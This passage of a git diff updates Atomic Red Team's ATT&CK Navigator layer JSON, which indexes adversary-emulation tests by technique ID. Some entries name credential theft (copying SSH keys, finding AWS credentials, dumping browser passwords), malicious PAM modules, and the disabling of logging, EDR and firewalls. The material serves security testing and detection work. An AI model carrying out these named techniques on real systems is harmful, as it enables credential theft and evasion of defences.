Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- chflags - Remove immutable file attribute\n- Chmod through c script\n- Chmod through c script (freebsd)\n- Chown through c script\n- Chown through c script (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n- Detect Virtualization Environment (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":2,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n- Security Software Discovery - pgrep (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":9,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - FreeBSD\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - FreeBSD\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"comment":"\n- Create Systemd Service\n- Create SysV Service\n- Create Systemd Service file,  Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Add command to .shrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"comment":"\n- Trap EXIT\n- Trap EXIT (freebsd)\n- Trap SIGINT\n- Trap SIGINT (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Make and modify binary from C source (freebsd)\n- Set a SetUID flag on file\n- Set a SetUID flag on file (freebsd)\n- Set a SetGID flag on file\n- Set a SetGID flag on file (freebsd)\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"comment":"\n- Sudo usage\n- Sudo usage (freebsd)\n- Unlimited sudo cache timeout\n- Unlimited sudo cache timeout (freebsd)\n- Disable tty_tickets for sudo caching\n- Disable tty_tickets for sudo caching (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"comment":"\n- Search Through Bash History\n- Search Through sh History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with CP (freebsd)\n- Copy Private SSH Keys with rsync\n- Copy Private SSH Keys with rsync (freebsd)\n- Copy the users GnuPG directory with rsync\n- Copy the users GnuPG directory with rsync (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on FreeBSD\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM rule (freebsd)\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":11,"enabled":true,"comment":"\n- Disable syslog\n- Disable syslog (freebsd)\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"comment":"\n- Disable history collection\n- Disable history collection (freebsd)\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment variable\n- Setting the HISTSIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTFILE environment variable (freebsd)\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":13,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start Packet Filter\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Add and delete Packet Filter rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":4,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Auditing Configuration Changes on FreeBSD Host\n- Logging Configuration Changes on Linux Host\n- Logging Configuration Changes on FreeBSD Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 9f48ef895..8898aefe0 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":47,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":55,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":75,"enabled":true,"links":[{"label":"View 